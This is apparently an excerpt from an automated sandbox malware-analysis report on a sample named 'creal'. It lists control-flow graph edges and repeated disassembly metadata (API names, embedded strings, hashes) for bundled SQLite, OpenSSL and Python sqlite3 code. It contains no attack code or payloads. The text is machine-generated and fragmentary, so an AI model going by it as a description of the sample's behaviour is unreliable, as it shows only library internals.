PyEval_SaveThread sqlite3_column_count PyEval_RestoreThread 101846->101857 101859 7ff8e700491c PyTuple_New 101846->101859 101861 7ff8e7004a09 sqlite3_changes 101846->101861 101862 7ff8e7004a25 PyEval_SaveThread sqlite3_reset PyEval_RestoreThread 101846->101862 101863 7ff8e700cf43 _Py_Dealloc 101846->101863 101864 7ff8e7004945 sqlite3_column_name 101846->101864 101866 7ff8e7004980 PyUnicode_FromStringAndSize 101846->101866 101868 7ff8e700cf52 _Py_Dealloc 101846->101868 101869 7ff8e7004ec0 PyEval_SaveThread 
sqlite3_bind_parameter_count PyEval_RestoreThread 101846->101869 101955 7ff8e7005730 16 API calls 101846->101955 101958 7ff8e7007ad0 PyEval_SaveThread sqlite3_reset PyEval_RestoreThread 101846->101958 101959 7ff8e70069ac 31 API calls 101846->101959 101956 7ff8e70058d0 17 API calls 101847->101956 101850 7ff8e700cf8b PyErr_Print 101848->101850 101851 7ff8e700cf97 PyErr_Clear 101848->101851 101850->101851 101851->101840 101854 7ff8e7004c71 PyEval_RestoreThread 101852->101854 101855 7ff8e7004c59 sqlite3_step sqlite3_finalize 101852->101855 101854->101832 101858 7ff8e7004c82 101854->101858 101855->101854 101856->101817 101857->101846 101960 7ff8e70058d0 17 API calls 101858->101960 101859->101846 101861->101846 101862->101846 101863->101846 101864->101846 101865 7ff8e700cf61 PyErr_NoMemory 101864->101865 101865->101817 101866->101817 101867 7ff8e7004992 PyTuple_Pack 101866->101867 101867->101846 101868->101846 101911 7ff8e7004f13 101869->101911 101870 7ff8e7005605 PySequence_Check 101871 7ff8e700532a 101870->101871 101870->101911 101874 7ff8e70056eb PyErr_SetString 101871->101874 101891 7ff8e700533e 101871->101891 101872 7ff8e700554f PyErr_Format 101897 7ff8e7004888 PyErr_Occurred 101872->101897 101873 7ff8e7005659 PySequence_Size 101873->101897 101873->101911 101874->101897 101875 7ff8e700545f PyErr_WarnFormat 101875->101897 101875->101911 101876 7ff8e700534d PyEval_SaveThread sqlite3_bind_parameter_name PyEval_RestoreThread 101878 7ff8e70056d2 PyErr_Format 101876->101878 101879 7ff8e7005378 PyUnicode_FromString 101876->101879 101877 7ff8e7004f67 sqlite3_bind_parameter_name 101877->101875 101877->101911 101878->101897 101879->101891 101879->101897 101880 7ff8e7005674 PyErr_Format 101880->101911 101881 7ff8e7005701 PySequence_GetItem 101887 7ff8e700570f _Py_Dealloc 101881->101887 101882 7ff8e70054a1 PyList_GetItem 101882->101911 101883 7ff8e70053a5 PyDict_GetItemWithError 101883->101891 101884 7ff8e700569b PyObject_GetItem 101889 7ff8e70056a9 PyErr_Occurred 

Control-flow Graph

[Control-flow graph 169, starting at 7ff8e7007c38; legend: Executed, Not Executed]
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Module_$Constant$Type$From$Err_String$Exception$InternStateUnicode_$Module$SpecType_$AttrFormatImport_sqlite3_errstrsqlite3_initializesqlite3_libversionsqlite3_libversion_numbersqlite3_shutdownsqlite3_threadsafe
                                                                                                                                                                                                                • String ID: 2.6.0$LEGACY_TRANSACTION_CONTROL$Unable to interpret SQLite threadsafety mode. Got %d, expected 0, 1, or 2$__adapt__$__conform__$_deprecated_version$executescript$finalize$functools$inverse$lru_cache$sqlite3.DataError$sqlite3.DatabaseError$sqlite3.Error$sqlite3.IntegrityError$sqlite3.InterfaceError$sqlite3.InternalError$sqlite3.NotSupportedError$sqlite3.OperationalError$sqlite3.ProgrammingError$sqlite3.Warning$sqlite3: SQLite 3.7.15 or higher required$sqlite_version$step$threadsafety$upper$value
                                                                                                                                                                                                                • API String ID: 3715894170-1388897118
                                                                                                                                                                                                                • Opcode ID: a4efa3e3f6614b92526c4b3a4b91d8600bed29440f19417f2b8d7921e743ca98
                                                                                                                                                                                                                • Instruction ID: ebabf418fd150d1404c11923a7ce83827944e961efc8bdce32c642106ecb0f5d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4efa3e3f6614b92526c4b3a4b91d8600bed29440f19417f2b8d7921e743ca98
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07E1A760B09B0392EE44DBA5E85477E23A4BF46BE4F446835CA3EC6790EF6CF1549312
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: R_new$R_set_debug$X_get0_md$D_get_sizeR_get_modeX_get0_cipherX_get_iv_length
                                                                                                                                                                                                                • String ID: ..\s\ssl\record\rec_layer_s3.c$U$do_ssl3_write
                                                                                                                                                                                                                • API String ID: 2155623385-3398879041
                                                                                                                                                                                                                • Opcode ID: 36d4d9ddf363054e33d8c3296ed87f71bfe2d0e7d958c3529b07b88d0e93790b
                                                                                                                                                                                                                • Instruction ID: a4d4979ef8b9b14c0ef87bb55214650e1b7dfdd38c59da1f29a53f6a6f807334
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36d4d9ddf363054e33d8c3296ed87f71bfe2d0e7d958c3529b07b88d0e93790b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27729D72A0878282FB209BA5D4507BD23A1FF45BC8F554136EE6E47A8ADF3CE545C702

                                                                                                                                                                                                                Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: L_sk_new_nullL_sk_pop_freeR_newR_set_debugX509X509_freeX509_new_exd2i_
                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem_clnt.c$tls_process_server_certificate
                                                                                                                                                                                                                • API String ID: 3085087540-2730446810
                                                                                                                                                                                                                • Opcode ID: 36e8d79e23d976b740ea242f5129b34b4295ff9e77b271edc4115a9c1831974b
                                                                                                                                                                                                                • Instruction ID: 7e2c34082eae753c903a84f40b2271386a807f41bfff2121e6ff9c1a0ce2cc79
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36e8d79e23d976b740ea242f5129b34b4295ff9e77b271edc4115a9c1831974b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBC1F662A08A8292EB20DBA5D4503FD77A1FB84BC4F544132DABE476D6DF3CE481C712
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: O_malloc$O_freeR_newR_set_debug
                                                                                                                                                                                                                • String ID: ..\s\ssl\record\ssl3_buffer.c$ssl3_setup_read_buffer$ssl3_setup_write_buffer
                                                                                                                                                                                                                • API String ID: 2137838121-2302522825
                                                                                                                                                                                                                • Opcode ID: 3ed476757c16f9c518a80d7b86d6f942c3d03468d456452f37b9b146c2e16dcf
                                                                                                                                                                                                                • Instruction ID: d0bf3de0167f771ad32442fb3ed657f6197b577288357c28db1dd43952cc31d5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ed476757c16f9c518a80d7b86d6f942c3d03468d456452f37b9b146c2e16dcf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C51AB72A08B4281FB109BA5E8847AD73A5FB94BD8F554435EE6E43785DF3DD481C301
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                • API String ID: 438689982-4201244970
                                                                                                                                                                                                                • Opcode ID: 83e2a97fa00efd0c27a9592cdce843648313d1d97cf6ab97798199b00e65efce
                                                                                                                                                                                                                • Instruction ID: 3bb1af8bdead2ae44b3483db251a5a3d6b9182ebd1aa4e832faad07f8fd33418
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83e2a97fa00efd0c27a9592cdce843648313d1d97cf6ab97798199b00e65efce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1932B962B29B9296EB648FA5944037937A0FF49BE4F084275CA6E07BD5DF3CE454C302
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                • API String ID: 3510742995-3762325461
                                                                                                                                                                                                                • Opcode ID: bdd65c06e807f738dd2697ad4d27a94250175461887e5150d1e454e4e0986083
                                                                                                                                                                                                                • Instruction ID: de65a605681499fddcbce7f893fd64d8bd953304a4ab0bf12390c1206c22629c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdd65c06e807f738dd2697ad4d27a94250175461887e5150d1e454e4e0986083
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7902CE62A2DB4685EB64AF91A49837AA7E4FF94BC8F180031DE4D07799DF3DE4458302
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                • API String ID: 438689982-1046679716
                                                                                                                                                                                                                • Opcode ID: 5ed36e81426d4dda266e1e2b72bbbc4cce9bbd62fb343d6ed1371e91b3143b91
                                                                                                                                                                                                                • Instruction ID: f48419b3491528f62c45ffedc18fdd06f60287a0038f3bbfe36c0a4715895464
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ed36e81426d4dda266e1e2b72bbbc4cce9bbd62fb343d6ed1371e91b3143b91
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59F18022A687C286FB24EBB194483BA67A0FF95BC8F184135DA4D07795DF7CE581C702
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpystrcmp
                                                                                                                                                                                                                • String ID: :memory:
                                                                                                                                                                                                                • API String ID: 4075415522-2920599690
                                                                                                                                                                                                                • Opcode ID: caaa475f843e1cf8634484f57e8112b8d208c1787e0867ca2710ba94a12e65cc
                                                                                                                                                                                                                • Instruction ID: cc0944ab23a1d85ffabb75a765a0b7cf64c68e8b268e61859a1f5d0d9e0988d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: caaa475f843e1cf8634484f57e8112b8d208c1787e0867ca2710ba94a12e65cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6427C62F2DB9282EB648FA5A45837927A4FF49BC4F044135DA8D43B95DF3CE494C312
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 31276548-0
                                                                                                                                                                                                                • Opcode ID: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
                                                                                                                                                                                                                • Instruction ID: 3de59616408dd5004597d7a6a1022fab9b6699f0eae1722f612c77e8623113c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FA1F664F2EB1691FE988BD5E89933422A1BF4ABC4F140535CA9E473A1DF7CE4919303
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$RestoreSave$DeallocErr_$sqlite3_reset$Iter_Object_OccurredStringTuple_$FromIterList_LongNextThread_get_thread_identsqlite3_stepsqlite3_stmt_busy$AppendCheckFormatLong_ModuleModule_PackSizeStateType_Unicode_Vectorcallsqlite3_changessqlite3_column_countsqlite3_column_namesqlite3_finalizesqlite3_get_autocommitsqlite3_last_insert_rowidsqlite3_prepare_v2sqlite3_stmt_readonly
                                                                                                                                                                                                                • String ID: BEGIN $Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Error while building row_cast_map$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$e$executemany() can only execute DML statements.
                                                                                                                                                                                                                • API String ID: 3905713625-3920904728
                                                                                                                                                                                                                • Opcode ID: ddcf874027f5f25215195d8631cc8c42a410216cb0c3c7f23cc6a095149d7a8c
                                                                                                                                                                                                                • Instruction ID: 6c31a5aa7acdb9ca6a0cec97aeb43b24e160076b285d0cff8f408f2e8e848d59
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ddcf874027f5f25215195d8631cc8c42a410216cb0c3c7f23cc6a095149d7a8c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A522935A09A4281EE549FA5E45437E23A0FF47BF5F140831EA2E876A4DF7CE846D306

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$DeallocObject_$Attr$Err_Unicode_$CompareType_Withstrcmp$Clear$AllocCalculateCallDictFastFromGenericMetaclassReadyTrueVectorcall
                                                                                                                                                                                                                • String ID: ABCMeta$GenericMeta$TypingMeta$_ProtocolMeta$__module__$__orig_bases__$__slots__$abc$mypyc classes can't have __slots__$mypyc classes can't have a metaclass$typing$typing_extensions
                                                                                                                                                                                                                • API String ID: 3039355408-3015203947
                                                                                                                                                                                                                • Opcode ID: 581e7a51ebe161312cd1d03399a5527e61c6b6fd9e8a3dc5876b46a657a736b2
                                                                                                                                                                                                                • Instruction ID: a71f59b3aced35d9b1ce26ffa01573653eb9f473249a9917391ab6e191926e45
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 581e7a51ebe161312cd1d03399a5527e61c6b6fd9e8a3dc5876b46a657a736b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DD16A32A09B86C2EA588FA9E95437C73A1BF49BD4F448035CE2E66255EF3CF145D302

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _strnicmp$Eval_Object_SizeThreadThread_get_thread_ident$Arg_Err_FormatParseRestoreSaveTrackTuple_Unicode_sqlite3_limitsqlite3_prepare_v2
                                                                                                                                                                                                                • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$You can only execute one statement at a time.$delete$insert$query string is too large$replace$sqlite3.Connection$the query contains a null character$update
                                                                                                                                                                                                                • API String ID: 603912194-3639599724
                                                                                                                                                                                                                • Opcode ID: 4fd8ca26ecb050e427ed40bdb856c4ce243b6fc914df62382e35d1afdce9c31c
                                                                                                                                                                                                                • Instruction ID: 5d960d4c6badf2fa55231549963150aa0bd7fdcaa48783d8186a07745fa5b5b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fd8ca26ecb050e427ed40bdb856c4ce243b6fc914df62382e35d1afdce9c31c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56815F21A0CA4285EF648BA1E858B7D2361BF46BE4F444832D96EC76A4DF2CE545E302

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
• Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AuditDeallocEval_List_Object_Sys_ThreadVectorcall$ConverterFromLongLong_ModuleModule_RestoreSaveStateThread_get_thread_identType_Unicode_sqlite3_busy_timeoutsqlite3_closesqlite3_open_v2
                                                                                                                                                                                                                • String ID: BEGIN$sqlite3.connect$sqlite3.connect/handle
                                                                                                                                                                                                                • API String ID: 3562732450-2348745481
                                                                                                                                                                                                                • Opcode ID: 8a2dca1dfa2ba05690071b078500926b146cf9129fe0a8956bc13880c2dc20a4
                                                                                                                                                                                                                • Instruction ID: b98f5ec0ccc8ee4034c1e69747e6929a21e0113449feaf2250493109d57cc260
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a2dca1dfa2ba05690071b078500926b146cf9129fe0a8956bc13880c2dc20a4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3B12836A09B4286EB608FA5E94436E73A5FB4ABE4F044835CE5D93758DF3CE450D702

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
• Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmp
